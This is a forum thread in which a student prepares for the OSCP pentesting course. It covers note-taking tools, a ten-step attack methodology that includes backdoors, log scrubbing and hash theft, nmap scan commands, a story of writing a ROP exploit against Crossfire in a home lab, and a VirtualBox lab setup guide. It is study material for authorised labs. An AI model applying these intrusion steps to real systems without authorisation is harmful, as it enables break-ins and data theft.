  1. Member
    Join Date
    May 2015
    Posts
    79
    #1

    Cool OSCP - JollyFrogs' tale

    I'll be starting my OSCP journey soon; that is to say: I have already started preparations for the journey but have not signed up to the course yet. I am spending a lot of time sharpening my axe in anticipation of the OSCP tree that yearns to be felled. I have done away with modesty and challenged myself with the goal to subvert 100% of the lab machines and get a 100% marking score on my exam, first try. I am very lucky to have a very understanding second half who fully supports my endeavor. 600 hours of self-study and lab time have been set aside for this great adventure.

    My basic plan is as follows:
    - Read as many forums and blogs as I can - This task is complete
    - Utilize the resources from those forums and blogs to prepare - This is where I am now
    - After preparing, I will sign up for the OSCP study and maximize my lab time

    I will dedicate 2-3 hours per day plus 8-10 on the weekends to studies. I'll sign up for 3 months of lab and should be able to put in more or less 360 hours of lab time if I prepare well. Seeing there are about 60 machines in the lab, that's an average of 6 hours per machine owned. I never expected this to be easy.

    My preparation tasks are proceeding well. I will detail more about my preparations in days to come.
    Last edited by JollyFrogs; 05-11-2015 at 08:38 AM. Reason: Forum was not saving my formatting. Solution: Allow "yui.yahooapis.com" in ScriptSafe in Chrome :)

  3. Senior Member MrAgent's Avatar
    Join Date
    Oct 2010
    Location
    Northern Virginia
    Posts
    1,283

    Certifications
    Sec+, MCP, MCSA 2003, MCTS, MCITP:VA, VCP5, MCSA 2012, MCSE Private Cloud, MCSE Server Infrastructure, C|EHv7, RHCSA, OSCP, GCIH, OSWP
    #2
    Good luck!
    2016 Goals: GCIH, OSWP - DONE!
    My OSCP review http://www.jasonbernier.com/oscp-review/

  4. Member
    Join Date
    May 2015
    Posts
    79
    #3
    I got introduced to the OSCP certification during an interview where the interviewer asked me if I had the OSCP credential. After the interview I immediately looked up OSCP on Google and found a wealth of information in forums and blog entries about the course. After reading many posts and blogs, I decided that I wanted (read "wanted" and not "needed") to do the OSCP, so I started doing lots of research into OSCP and the materials. I learnt that the primary required attribute of any pentest is the preparation and enumeration phase. I learnt about how hard the labs were, and that some machines like Sufferance, Pain and Gh0st were amongst the hardest, toughest nuts to crack. This appealed to me and I set myself a challenge: To hack each and every machine in the labs, and to pass my exam with a 100% score. There are around 60 lab machines and many people struggle in the labs, so this is going to be quite the achievement. I would have to maximize my time in the labs as much as possible if I wanted a chance at hacking (aka "owning" or "pwning") each and every machine that was presented to me.


    After reading many forums, blogs, tweets, and any other information I could get my hands on, I realised that I would have to prepare thoroughly if I wanted to maximise my time in the labs. I've read about some people taking 4 weeks just to get through the course materials, then another 4 weeks to get everything in order before they can access the labs. I was not going to let that happen to me; I wanted to start tackling the labs from the get go. I asked my partner if she was ok with me disappearing into virtual labs every night and every weekend for the next 3 months; she is very supportive.


    One of the most important aspects of my preparations would be to decide what note-keeping software I was going to use. OSCP recommends a program called "KeepNote", but me being me, I decided to make up my own mind. So I spent two full days trying various note-keeping programs. I tried CherryTree, KeepNote, EverNote, OneNote, NoteCase, Zim, KeyNote, and many more. I had certain requirements for what a good note-keeping tool would have to do if I wanted to maximise my time in the labs:
    - Hierarchical (tree with sub branches and "leaves" aka pages)
    - Easy screen Clipping feature (press a shortcut and the program inserts a screenshot for you in your notes)
    - NOT in the cloud (I prefer not to put personally identifiable items in the cloud)
    - Export into .PDF or .DOC format so I didn't have to rewrite my report after taking the notes


    CherryTree, KeepNote and OneNote were my preferred tools. I really liked OneNote with one exception: The free version of OneNote forces you to save everything into the cloud, unencrypted. CherryTree looked good, plenty of add-ons and plugins, and it could do what I wanted, although simple things like setting up screen clipping were very clumsy. I eventually settled on KeepNote, due to its simple layout and integrated screenshot functionality. The only downside of KeepNote is that it can't save its output in .PDF format. But when I thought about that requirement a bit more, it didn't make sense to just compile my notes in a .PDF and send that off to the OffSec guys: Plenty of items in my notebook would be for personal use only or not relevant to the exam. Many screenshots I might not need or want in the report, so I would probably have to compile a separate report anyway, which I have decided to do in Word, using the information and screenshots in KeepNote.


    I've started using KeepNote now and I'm very satisfied with the decision to use KeepNote, having tried many other tools. I'm writing this note in KeepNote!


    Tips on using KeepNote:
    - Take a screenshot by pressing CTRL-INSERT.
    - Run KeepNote off an SSD hard drive otherwise it can be sluggish.
    - If possible, don't attach files into KeepNote or it might corrupt your notes. Try to keep sploits/files in a separate directory on your PC.
    - Spend a few hours setting up your folder structure.
    - Make frequent backups. I backup my KeepNote notebook every 3-4 hours.

  5. Audentis Fortuna Iuvat veritas_libertas's Avatar
    Join Date
    Feb 2009
    Posts
    5,652

    Certifications
    eCPPT, GPEN, GWAPT, GCIH, CISSP, CCNA (expired), MCTS
    #4
    Sounds like fun. I'm hoping to get to the OSCP eventually. Right now I'm slowly working through eJPT and then eCPPT. If you want to be "elite" you could use VIM for note keeping.

    Good luck with the OSCP!
    Currently working on: Resting

  6. Member
    Join Date
    Nov 2014
    Posts
    77

    Certifications
    CISSP, GSEC, GCED, GWAPT, GISP
    #5
    Thank you for sharing your thoughts on tools for note-keeping. I am working on enhancing my skill set and doing some advance prep work, before beginning my OSCP journey. My plan for this summer is to learn python, develop a greater comfort level with Kali Linux, and do some self-study to refresh my basic pentesting knowledge, before registering for PWK in the fall.

    One of the things I had on my checklist was to find a tool that would work well for organizing and managing extensive sets of notes. Your comments will be very useful when I am choosing a tool for notes.

    Thanks again!
    ~justjen
    Last edited by justjen; 05-17-2015 at 06:40 PM.

  7. Member
    Join Date
    May 2015
    Posts
    79
    #6
    Another week has passed, and I'm having a blast with the OSCP preparations so far. I haven't even registered for the course yet, as I am still sharpening my axe. I've started thinking about a calculated approach for pen-testing. I felt the generic approach was a bit vague, so I have come up with a much more detailed approach. I intend to script as many of the steps as possible; I've started scripting 1) and 3).


    The system I came up with (which I will probably tune once I get started in the labs) is as follows:


    1) Recon scripts: Automated recon of a network. This will give us a generic idea of what kind of machines are on the network and the various OS's and possible "sweet spots" to start the exploitation process. Only the top 10-20 ports are scanned but we're scanning the whole /24 range.

    2) Mapping scripts: Mapping is where I aggregate the data gathered from the recon scripts and start to make sense of things. This includes relationships between systems and traffic flows. This is a manual step which will be done in Visio manually. I have built a Visio template diagram which I will use for this purpose. Mapping will be a continuous process as I move forward in the lab and the Visio diagram will be updated on an almost daily basis.

    3) Remote enumeration scripts: These are scripts which will scan a single system remotely, mostly enumerating ports and shares but also the information FROM those ports. This is where the full 1-65535 ports will be scanned (both TCP and UDP) and where each port is fingerprinted, SMB shares are enumerated, user IDs, SNMP details, FTP banners, OS versions, etc.

    4) Remote Exploits & Privilege Escalation: Here we move from knocking on the door to bashing the door out of its sockets and forcing entry into the remote system. This includes remote "point-and-shoot-instant-system-access", FTP brute-force, HTTP directory brute force, SNMP brute force, active exploits against open services, etc.

    5) Local Enumeration scripts: Once we have entered the machine remotely, we enumerate again, getting as much information from the system as possible. This includes interesting files, bash history, cmd history, environment settings, memory, running services, directory permissions, service permissions, scheduled jobs, weak permissions, etc.

    6) Local Exploits & Privilege escalation: We might have a low level user, or a restricted administrator account; this is where we escalate to full root/system level access. This includes UAC bypass, elevation scripts, local exploits, brute forcing, etc.

    7) Persistence: This is where we install backdoors to secure our access. We don't want to have to go through all the steps above again. Things like adding local administrator accounts, setting services to start automatically on boot, putting a pinhole in the firewall service, etc.

    8) Root Loot scripts: This is where we search the whole system with system/root access for interesting data. This includes stealing hashes from LSA, configuration scripts, SAM/shadow database, cracking MD5 and NTLM, checking currently connected users, checking relationships between this host and other hosts, etc.

    9) Cleanup: This is where we scrub logfiles, clean exploits, hide backdoors; essentially we "wipe our fingerprints" from the system.

    10) Update maps and diagrams, and move to another system at point 3).
    Last edited by JollyFrogs; 05-22-2015 at 08:13 AM.

  8. Senior Member wd40's Avatar
    Join Date
    May 2007
    Location
    Bahrain
    Posts
    903

    Certifications
    CISA, eJPT, CompTIA x 6, MCP, MCTS
    #7
    Great detailed post, Thanks.

    Please continue posting, I am sure people will be following your posts.

    I wish I had the willpower to do this...

  9. Senior Member MrAgent's Avatar
    Join Date
    Oct 2010
    Location
    Northern Virginia
    Posts
    1,283

    Certifications
    Sec+, MCP, MCSA 2003, MCTS, MCITP:VA, VCP5, MCSA 2012, MCSE Private Cloud, MCSE Server Infrastructure, C|EHv7, RHCSA, OSCP, GCIH, OSWP
    #8
    Just a word of advice. If you're going to script out scanning, make sure you have something in place to scan even if ICMP is not enabled on the target.
    2016 Goals: GCIH, OSWP - DONE!
    My OSCP review http://www.jasonbernier.com/oscp-review/

  10. Senior Member Mitechniq's Avatar
    Join Date
    Jun 2012
    Posts
    262

    Certifications
    CCNA, GIAC G2700, VCP5-DCV C|EH, ISC2 CISSP, AWS-PSA (Most have Expired)
    #9
    I believe I am missing something here: why are you going through the effort of building out your own scripts when Kali has all the modules and tools to pen-test? Since you will be using Kali for the labs and the exams, wouldn't it just be better to download Kali and familiarize yourself with it?

  11. Senior Member MrAgent's Avatar
    Join Date
    Oct 2010
    Location
    Northern Virginia
    Posts
    1,283

    Certifications
    Sec+, MCP, MCSA 2003, MCTS, MCITP:VA, VCP5, MCSA 2012, MCSE Private Cloud, MCSE Server Infrastructure, C|EHv7, RHCSA, OSCP, GCIH, OSWP
    #10
    A part of the course is bash scripting. I did the same thing during my lab time. Scripting out a scan will allow you to automate a lot of stuff; it's very useful.
    2016 Goals: GCIH, OSWP - DONE!
    My OSCP review http://www.jasonbernier.com/oscp-review/

  12. Senior Member
    Join Date
    Oct 2013
    Location
    Washington DC
    Posts
    498

    Certifications
    OSCP, eMAPT, eWPT, CISSP, GPEN, GWAPT, GCIH, GCIA, GSEC, CEH, CNDA, ECSA, CHFI, Sec+, Net+
    #11
    Quote Originally Posted by Mitechniq View Post
    I believe I am missing something here: why are you going through the effort of building out your own scripts when Kali has all the modules and tools to pen-test? Since you will be using Kali for the labs and the exams, wouldn't it just be better to download Kali and familiarize yourself with it?
    You are exactly right. There is absolutely no reason to automate discovery during the PWK course. Just use Nmap.

    For a lot of people though, OSCP is one of their first encounters with scripting and automation. The course demonstrates basic automation within the context of scanning and people often tend to get the idea that they need to do this, when in fact, the course is really just trying to demonstrate automation fundamentals.

    I've literally seen people get so wrapped up in this part of the course that they completely forget the objective is to start popping boxes.

  13. Member
    Join Date
    May 2015
    Posts
    79
    #12
    Quote Originally Posted by Mitechniq View Post
    I believe I am missing something here: why are you going through the effort of building out your own scripts when Kali has all the modules and tools to pen-test? Since you will be using Kali for the labs and the exams, wouldn't it just be better to download Kali and familiarize yourself with it?
    I don't believe that using a powerful tool such as Metasploit will teach the level of fundamentals that I am seeking.

    I learned about fuzzing, assembly language, endian systems, memory and debuggers. The easy path would have been to use a readily available fuzzing tool, or a proof of concept code and modify the shell code to open a shell to a slightly different IP address.

    I chose the hard way and wrote a Python script (I had never seen a Python script until 2 weeks ago) to fuzz the application, based on another exploit I had written for a more basic application. The result of coding the fuzzer myself is that I know what each and every line of code does and why it is there. In the process of exploiting VulnServer.exe I created a generic process for writing exploits.

    I seek not just to admire the magic, but to understand and master it.

    Quote Originally Posted by MrAgent View Post
    Just a word of advice. If you're going to script out scanning, make sure you have something in place to scan even if ICMP is not enabled on the target.
    Agreed, I was anticipating firewalls blocking ICMP. These are the commands I decided on using:

    1) Start with a recon scan of the network to get an idea of the network (grep needs -E for the alternation to work, otherwise the '|' is matched literally and nothing is filtered):
    nmap -Pn -F -sSU -T5 -oX /root/10.1.1.1-254.xml 10.1.1.1-254 | grep -Ev 'filtered|closed' > /root/quick_recon.txt

    2) Then force-scan all ports UDP + TCP per host (takes about 4 minutes per host on a LAN or roughly 17 hours for 254 hosts):
    nmap -Pn -sSU -T4 -p1-65535 -oX /root/10.1.1.110.xml 10.1.1.110 | grep -Ev 'filtered|closed'

    3) Then run an intensive scan on the open ports per host, TCP and UDP separately to speed the scan up (the port list is pulled from the XML written in step 2; filtering on state="open" keeps individually listed closed or filtered ports out of the -p list, and the cut field 4 is the portid attribute):
    tcp: nmap -nvv -Pn -sSV -T1 -p$(grep 'state="open"' /root/10.1.1.110.xml | grep 'protocol="tcp"' | cut -d'"' -f4 | paste -sd "," -) --version-intensity 9 -oX /root/10.1.1.110-intense-tcp.xml 10.1.1.110
    udp: nmap -nvv -Pn -sUV -T1 -p$(grep 'state="open"' /root/10.1.1.110.xml | grep 'protocol="udp"' | cut -d'"' -f4 | paste -sd "," -) --version-intensity 9 -oX /root/10.1.1.110-intense-udp.xml 10.1.1.110

    Note: During the lab time, I intend to reset the host before doing a full port scan. I will reset each host before I attack it to ensure that there are no spoilers or backdoors on the host.
    Last edited by JollyFrogs; 05-23-2015 at 05:01 AM. Reason: spacing removed from code
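The three-step scan above, as an added example that is not the poster's own script: the open-port extraction is done by parsing nmap's -oX XML rather than the grep/cut pipeline, so only ports in state "open" are kept (the pipeline also picks up individually listed closed or filtered ports and UDP "open|filtered" guesses), and the step-3 commands are built from the result with -Pn kept so hosts that drop ICMP are still scanned (MrAgent's point). The XML is a constructed sample of a single-host scan; nothing is run against a network.

```python
"""Turn an nmap -oX file into per-protocol open-port lists and the follow-up
version-scan commands. Added example for the forum post above, not the
poster's code; the XML below is constructed, not a real scan result."""
import xml.etree.ElementTree as ET

# Constructed sample of what `nmap -Pn -sSU -p1-65535 -oX ... 10.1.1.110`
# writes: one host, ports in several states. Not captured from a real scan.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -Pn -sSU -p1-65535 -oX /root/10.1.1.110.xml 10.1.1.110">
<host><status state="up" reason="user-set"/>
<address addr="10.1.1.110" addrtype="ipv4"/>
<ports>
<extraports state="closed" count="65520"/>
<port protocol="tcp" portid="21"><state state="open" reason="syn-ack"/><service name="ftp"/></port>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/><service name="ssh"/></port>
<port protocol="tcp" portid="23"><state state="closed" reason="reset"/></port>
<port protocol="tcp" portid="80"><state state="filtered" reason="no-response"/></port>
<port protocol="udp" portid="161"><state state="open" reason="udp-response"/><service name="snmp"/></port>
<port protocol="udp" portid="53"><state state="open|filtered" reason="no-response"/></port>
</ports>
</host>
</nmaprun>
"""


def open_ports(xml_text, proto):
    """Return the sorted list of ports of one protocol ('tcp' or 'udp') that
    nmap reported as state="open". Ports in 'closed', 'filtered' or the UDP
    guess 'open|filtered' are left out; the grep/cut pipeline in the post
    cannot make that distinction because it matches every <port> line."""
    root = ET.fromstring(xml_text)
    ports = set()
    for port in root.iterfind("./host/ports/port"):
        if port.get("protocol") != proto:
            continue
        state = port.find("state")
        if state is not None and state.get("state") == "open":
            ports.add(int(port.get("portid")))
    return sorted(ports)


def intense_scan_commands(xml_text, target, outdir="/root"):
    """Build the step-3 commands: one -sSV run over the open TCP ports and one
    -sUV run over the open UDP ports, each written to its own -oX file.
    -Pn is kept so a host that does not answer ICMP is still scanned.
    A protocol with no open ports gets no command, so nmap is never handed
    an empty -p list."""
    cmds = {}
    for proto, scan_flag in (("tcp", "-sSV"), ("udp", "-sUV")):
        ports = open_ports(xml_text, proto)
        if not ports:
            continue
        plist = ",".join(str(p) for p in ports)
        cmds[proto] = (f"nmap -nvv -Pn {scan_flag} -T1 -p{plist} --version-intensity 9 "
                       f"-oX {outdir}/{target}-intense-{proto}.xml {target}")
    return cmds


if __name__ == "__main__":
    for proto, cmd in intense_scan_commands(SAMPLE_XML, "10.1.1.110").items():
        print(proto, cmd)
```

On a real lab host the same functions read the XML that step 2 wrote to /root; the printed commands are then run by hand or from the recon script.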

  14. Member
    Join Date
    May 2015
    Posts
    79
    #13
    I learnt about ROP chains yesterday. Very interesting stuff. How did I get into ROP chains, and what are they? Ohhh good question, let's go back in time! Keep in mind, I haven't yet started the course; this is all part of my preparations to maximize lab time.

    In the OSCP Syllabus (available here: https://www.offensive-security.com/d...-with-kali.pdf) a "Crossfire" application is mentioned. I went to exploit-db.com and saw that crossfire 1.9.0 is vulnerable to a buffer overflow (https://www.exploit-db.com/exploits/1582/). The code is in C and is overly complex for my needs (dynamic shellcodes etc). The code abuses an overflow in the "setup sound" module and I had to fuzz the application with various codes until I found the exploit code I needed and the server crashed. I am running the Crossfire application on my Kali machine and use Evan's Debugger (EDB) which comes as part of the Kali distribution. After crashing the server, finding the bad characters and being able to overwrite the EIP, I sent my reverse shell in anticipation of a prompt... and nothing happened!

    In EDB I saw a segmentation fault. This was new. I put a breakpoint on the JMP ESP trampoline I had set up to jump to my shell code, and reran the sploit. EDB broke out at my JMP ESP trampoline, I pressed F8 to step one instruction further and surely I was in my jump code which was about to jump to my shell code. When I pressed F8 on the first instruction in my jump code I got a segmentation fault. This was new and unexpected! Why would the program segment fault on a perfectly good instruction? I started googling "Linux memory segmentation fault" which gave too many results, I then searched "linux segmentation fault exploit" and found "c - Exploiting buffer overflow leads to segfault - Information Security Stack Exchange", which hints toward a feature called ASLR and "-z execstack". Further research indicates that these are two memory protection mechanisms: ASLR randomizes the memory address space and the -z execstack relates to a feature called execshield (aka "NX bit", aka "DX", aka Execute Disable, aka DEP, aka many other names). I checked on my Kali machine whether this might be the culprit with the following command "dmesg | grep --color '[NX|DX]*protection'" and indeed, NX was enabled. Further investigation into the possibility of disabling the NX bit (including via my VirtualBox option "Enable PAE/NX") showed this would just result in Kali emulating NX and not really solve my problem in the first place: If this was a remote host, would I be able to disable NX via its host system or via kernel options? The answer is most likely no, unless I had some kind of root/system/god-mode access to the network, in which case the exercise would not be required.

    DEP/NX works very simply: If memory is R/W, then it can't be X. If memory is R/X, then it can't be W. So if we can WRITE to the memory (stack) then we can't EXECUTE it (hence the segmentation fault). If we can EXECUTE it, we can't WRITE to it.

    So I started looking into the option to exploit this "NX bit" and whether I could program around it: Enter ROP! ROP stands for Return Oriented Programming. Where normal programs use the EIP address to point to the next instruction, ROP uses the ESP address to point to the next instruction. How can this be? Well, it turns out that any "RET" instruction in a program looks up the original source address which it gets from the ESP, not the EIP. So while normally we'd try to control the flow of a program with EIP, with ROP we try and control the flow of the program with ESP. Let me explain:

    Normal execution: MOV EAX,1 -> EIP increased by one which points to the next instruction -> MOV EBX,1 -> EIP increased by one which points to the next instruction etc
    ROP execution: ESP points to RET -> return address taken from ESP stack -> ESP points to another RET -> EIP never gets a chance to play

    So what good is it to execute RET instructions the whole time? Well not much. But here comes the genius: If we can find OTHER instructions just before the RET instructions, we can have the system execute those instructions, the RET will be next which we control because we control the ESP stack. We can't WRITE the instructions we're using, but we can EXECUTE them (and as such, DEP allows us to execute).

    And that's where I am now, do I install a vulnerable operating system without NX support and simply follow the exercises, or do I write a ROP exploit for Crossfire 1.9.0? The ROP exploit is tempting but will be time-consuming, it could take me a week to finish a ROP exploit, which I could spend on finishing my preparations. I'll keep you posted!
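The "-z execstack" / NX distinction above, as an added example that is not the poster's exploit code: a small parser that reads the PT_GNU_STACK program header of an ELF binary (the header the linker writes, with PF_X set when "-z execstack" was used) and reports whether the binary asks the kernel for an executable stack, which is the first thing to check when a stack-resident payload faults. The ELF images it is exercised on are constructed in memory by the build_elf helper, which belongs to this example; readelf -lW shows the same GNU_STACK line for a real file.

```python
"""Report whether an ELF binary requests an executable stack via its
PT_GNU_STACK program header. Added example for the NX / -z execstack
discussion above; not code from the poster. build_elf() makes constructed,
non-loadable test images so the check can be run offline."""
import struct
import sys

PT_GNU_STACK = 0x6474E551           # program-header type holding stack permissions
PF_X, PF_W, PF_R = 0x1, 0x2, 0x4    # segment permission bits


def stack_is_executable(elf):
    """Inspect an ELF image (bytes) and report what it asks for its stack.

    Returns True if PT_GNU_STACK carries PF_X (linked with -z execstack),
    False if PT_GNU_STACK is present without PF_X (the normal NX-friendly
    case), and None if no PT_GNU_STACK header exists at all, which older
    toolchains produced and which loaders historically treated as a request
    for an executable stack.
    """
    if elf[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    is64 = elf[4] == 2                      # EI_CLASS: 1 = ELF32, 2 = ELF64
    endian = "<" if elf[5] == 1 else ">"    # EI_DATA: 1 = little, 2 = big
    if is64:
        (e_phoff,) = struct.unpack_from(endian + "Q", elf, 0x20)
        e_phentsize, e_phnum = struct.unpack_from(endian + "HH", elf, 0x36)
    else:
        (e_phoff,) = struct.unpack_from(endian + "I", elf, 0x1C)
        e_phentsize, e_phnum = struct.unpack_from(endian + "HH", elf, 0x2A)
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        if is64:
            # Elf64_Phdr: p_type and p_flags are the first two fields
            p_type, p_flags = struct.unpack_from(endian + "II", elf, off)
        else:
            # Elf32_Phdr: p_flags sits at offset 24, after the size fields
            (p_type,) = struct.unpack_from(endian + "I", elf, off)
            (p_flags,) = struct.unpack_from(endian + "I", elf, off + 24)
        if p_type == PT_GNU_STACK:
            return bool(p_flags & PF_X)
    return None


def build_elf(bits, stack_flags):
    """Constructed minimal little-endian ELF image (header plus at most one
    program header) used only to exercise stack_is_executable; it cannot be
    loaded or run. stack_flags=None omits the PT_GNU_STACK header."""
    is64 = bits == 64
    ident = b"\x7fELF" + bytes([2 if is64 else 1, 1, 1]) + b"\x00" * 9
    phnum = 0 if stack_flags is None else 1
    if is64:
        # e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, e_flags,
        # e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
        header = ident + struct.pack("<HHIQQQIHHHHHH", 2, 0x3E, 1, 0, 64, 0, 0,
                                     64, 56, phnum, 0, 0, 0)
        phdr = b"" if stack_flags is None else struct.pack(
            "<IIQQQQQQ", PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 16)
    else:
        header = ident + struct.pack("<HHIIIIIHHHHHH", 2, 0x03, 1, 0, 52, 0, 0,
                                     52, 32, phnum, 0, 0, 0)
        phdr = b"" if stack_flags is None else struct.pack(
            "<IIIIIIII", PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 16)
    return header + phdr


def describe(path):
    """Read a real binary from disk and return a one-line verdict."""
    with open(path, "rb") as fh:
        result = stack_is_executable(fh.read())
    return {True: "executable stack (-z execstack)",
            False: "non-executable stack",
            None: "no PT_GNU_STACK header"}[result]


if __name__ == "__main__":
    for path in sys.argv[1:]:
        print(path, "->", describe(path))
```

A non-executable verdict only says what the binary requests; whether the CPU and kernel actually enforce it is the separate NX/PAE question the poster checked with dmesg.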

  15. Senior Member
    Join Date
    Oct 2012
    Location
    Lexington, KY
    Posts
    534

    Certifications
    CISSP, GMON
    #14
    You should read up on EMET, and how to bypass it, if you are interested in learning more about modern memory protections.

  16. Member
    Join Date
    May 2015
    Posts
    79
    #15
    Quote Originally Posted by wes allen View Post
    You should read up on EMET, and how to bypass it, if you are interested learning more about modern memory protections.
    Hi Wes,

    Thanks. The current exploit I'm writing runs on Linux and EMET seems to use similar techniques to the Linux memory protections. I've decided to go the hard way and write a ROP exploit for Crossfire 1.9.0 running on Kali 1.1.0a. I will read up on EMET after I get success - which could take considerable effort and time.

  17. Member
    Join Date
    May 2015
    Posts
    79
    #16
    Ok, so after spending two full days programming ROP chains, I finally created a working ROP chain which works on the Kali PAE image. I now realize that I have been working with the wrong image from the very start.

    So here is a tip:
    When downloading the Kali image from the offensive security site (https://www.offensive-security.com/k...mage-download/) make sure you choose the image called "Kali 32 bit VM" and not the image called "Kali 32 bit PAE VM" like I did, haha. I learnt today that sometimes more is not better.

    I did learn a lot by using the PAE image:
    - Built a working ROP chain
    - Used the gdb and edb debuggers more proficiently
    - Wrote scripts more efficiently
    - Found lots of interesting websites in the process
    - Got better at python scripting
    - Learnt some really cool assembly tricks
    - Learnt to decompile shellcode to assembly code to analyze what it does
    - Learnt to write my own shellcode in assembly, compile it and run it!
    - including my own first assembly reverse shell

    But, I must keep on track, it's time to move on to web application vulnerabilities and SQL injection, woop woop!

  18. Member
    Join Date
    May 2015
    Posts
    79
    #17
    JollyFrogs, Brisbane Australia
    Version: 0.1
    Revision date: 26 May 2015


    Welcome message
    ---------------
    This is my OSCP build guide, the goal of this guide is to help set up a Linux Kali machine on VirtualBox for OSCP studying.
    Note: This guide is written for a Windows 7 64-bit Host OS; I strongly advise using this operating system to install your OSCP machines.


    This is the hardware that I used to set up this lab; if you don't have similar or better hardware, I advise investing a little in getting good hardware:
    Asus Maximus Hero VI motherboard
    32GB memory (Kingston)
    Intel 120GB SSD
    Core i7-4770K CPU @ 3.50GHz, 4 Core(s), 8 Logical Processors
    Windows 7 64-bit (6.1.7601 SP1)


    I have created this lab using my own network IP addressing, details of which are:
    (All subnet masks in the LAN are /24 aka 255.255.255.0)


    The following components are what I start with, just my PC and a router which I used as default gateway to connect to the internet:
    10.1.1.1 = My physical internet router (a Ubiquiti ERLite3) which acts as my default gateway and DNS server.
    10.1.1.200 = My main PC LAN interface; we will lose this IP when we configure a BRIDGE interface later


    The following IP addresses are used for various components that are added during this guide:
    10.1.1.200 = My main PC BRIDGE interface
    10.1.1.199 = Kali 1.1.0a VirtualBox VM


    You have two options when following this guide:
    1) Rename all references to the IP addresses above and in this guide to IP addresses you are using on your LAN.
    or
    2) Renumber your internal network IP addressing to use the same IP addresses as in this guide.


    You do not need hardware components to set up this lab other than a beefy PC, everything is virtualized in your PC.


    ------------
    Preparations
    ------------


    Note: The fun part begins in the section called "After Reboot", but don't skim over these first steps; they are the foundation of your environment. Any mistake here will affect your environment later in unpredictable ways, please take the time to go through these steps carefully. Spelling matters, typos matter. If you run into any issues during installation, please re-read the instructions carefully and ensure you haven't made a typo.


    IMPORTANT NOTE: I don't isolate hosts on my network. This is a very *UNSAFE* practice, especially when meddling with vulnerable applications and systems while coding and testing new exploits. I run a simple but good firewall (Ubiquiti ERLite3) which protects my network from outside attacks, but more importantly, I have off-line backups of all my important files and documents. If this is something that you don't feel 100% comfortable with, then you should set up an isolated network which is totally segregated from your home network. VirtualBox supports this kind of set up via "Host-only adapters".


    Get required files:
    --------------------
    VirtualBox 4.3.26 R98988:
    http://dlc-cdn.sun.com/virtualbox/4....-98988-Win.exe


    Kali 1.1.0a (kali-linux-1.1.0a-i486.iso):
    http://images.offensive-security.com...1.0a-vm-486.7z
    NOTE: For the OSCP exam, you'll need the 32-bit Kali, NOT the 64-bit as people have reported issues with 64-bit.
    NOTE: Don't get the "PAE" version of Kali Linux! We'll be running buffer overflows on your Kali and PAE will make the exercise needlessly hard.


    Create and bridge a loop-back adapter so your virtual machines can talk to your physical PC and network
    -------------------------------------------------------------------------------------------------------
    - Click the Windows Start button (bottom left)
    - type "cmd" but do not press enter
    - Right-click "cmd.exe" (top of start bar menu) and select "run as Administrator" (Click "Yes" to confirm)
    Note: In the black cmd.exe screen:
    - type "hdwwiz.exe" and press Enter
    Note: the "Add Hardware Wizard" window opens
    - Click "Next"
    - Select “Install the hardware that I manually select from a list (Advanced)” and click "Next"
    - Select “Network adapters” and click "Next"
    - Select “Microsoft” and “Microsoft Loopback Adapter” under Manufacturer and Network Adapter respectively, then click "Next"
    - Click "Next" to install the loopback adapter
    - Click "Finish" to close the "Add Hardware" screen
    Note: We're still in the black cmd.exe screen:
    - type "ncpa.cpl" and press Enter
    Note: the "Network Connections" window opens
    - Right-click the adapter "Microsoft Loopback Adapter" and select "Rename"
    - Rename the Loopback Adapter to "LOOPBACK" to remove confusion later
    - Right-click your wired network adapter and select "Rename"
    - Rename your wired network adapter to "LAN"
    - Highlight (left click while holding CTRL key pressed) both the LOOPBACK adapter and your LAN network adapter
    - Right click on the LOOPBACK while both adapters are highlighted and select "Bridge Connections"
    Note: This will create a new network card called "Network Bridge"
    - Right-click your new bridge adapter and select "Rename"
    - Rename your wired network adapter to "BRIDGE"
    - Right-click "BRIDGE" and select "Properties"
    In the "BRIDGE Properties" screen:
    - Left-click (this highlights) "Internet Protocol Version 4 (TCP/IPv4)" and click "Properties"
    In the "Internet Protocol Version 4 (TCP/IPv4) Properties" screen:
    In the "General" tab at the top:
    Select "Use the following IP address"
    IP address: 10.1.1.200
    Subnet mask: 255.255.255.0
    Default gateway: 10.1.1.1
    Preferred DNS server: 10.1.1.1
    Alternate DNS server: <leave blank>
    - Click "OK" to close the "Internet Protocol Version 4 (TCP/IPv4) Properties" screen
    - Click "Close" to close the "BRIDGE Properties" screen
    Note: We're still in the black cmd.exe screen:
    - type "ping www.google.com"
    Note: You should see replies from the google web server. Your BRIDGE adapter is now your main network adapter
    Note: Do not proceed if you do not have internet connectivity
    - Close the "Command Prompt" black cmd.exe screen


    Install VirtualBox
    ------------------
    Run "C:\GNS3\INSTALLERS\VirtualBox-4.3.26-98988-Win.exe"
    Note: Click "Yes" on any opening warnings
    - Click "Next"
    - Click "Next" (install all options)
    - Click "Next"
    - Click "Yes"
    - Click "Install" to start the installation
    - Click "Yes" at the UAC warning screen
    - Click "Install" to install the device driver
    - Click "Finish"


    Install Kali 1.1.0a on VirtualBox 4.3.26 R98988
    --------------------------------------------
    Unzip the file kali-linux-1.1.0a-vm-486.7z to E:\VIRTUALBOX_DISKS\kali\


    Start "Oracle VM VirtualBox"
    - Click "New"
    Name: Kali110a-32bit-NOPAE
    Type: Linux
    Version: Debian (32 bit)
    - Click "Next"
    MB: 1024
    - Click "Next"
    Select "Use an existing virtual hard drive file"
    - Click the little yellow folder with the green arrow
    Choose: "E:\VIRTUALBOX_DISKS\kali\Kali-Linux-1.1.0-vm-486.vmdk"
    - Click "Create"
    NOTE: A new icon "Kali110a-32bit-NOPAE" was created in your "Oracle VM VirtualBox Manager"


    NOTE: Leave settings at default unless otherwise stated below
    NOTE: I'm showing some important settings even though they are defaults, in case the defaults change some day
    - Right-click "Kali110a-32bit-NOPAE" in the left menu and click "Settings..."
    General - Advanced - Shared Clipboard: "Bidirectional"
    System - Motherboard - Floppy: Untick
    System - Processor - Enable PAE/NX: Make sure this is NOT ticked
    Audio - Enable Audio: Untick
    Network - Adapter 1 - Enable Network Adapter: Tick
    Network - Adapter 1 - Attached to: "Bridged Adapter"
    Network - Adapter 1 - Name: "MAC Bridge Miniport"
